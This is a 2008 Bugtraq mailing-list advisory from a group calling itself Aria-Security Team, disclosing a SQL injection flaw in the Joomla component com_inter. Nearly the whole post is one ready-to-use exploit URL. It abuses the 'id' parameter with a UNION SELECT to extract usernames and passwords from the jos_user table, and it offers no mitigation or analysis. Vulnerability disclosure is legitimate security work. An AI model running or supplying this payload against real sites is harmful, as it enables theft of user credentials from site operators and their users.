
Date: 24 Feb 2008 01:17:59 -0000
From: no-reply@...a-Security.Net
To: bugtraq@...urityfocus.com
Subject: Joomla com_inter "id" Remote SQL Injection

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : AurA, Sc0rp!on, mormoroth, Kinglet, iM4N, 
Joomla com_inter "id" Remote SQL Injection

index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user

(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1464)

The-0utl4w
Aria-Security Team
(Credits to Aria-Security Team)
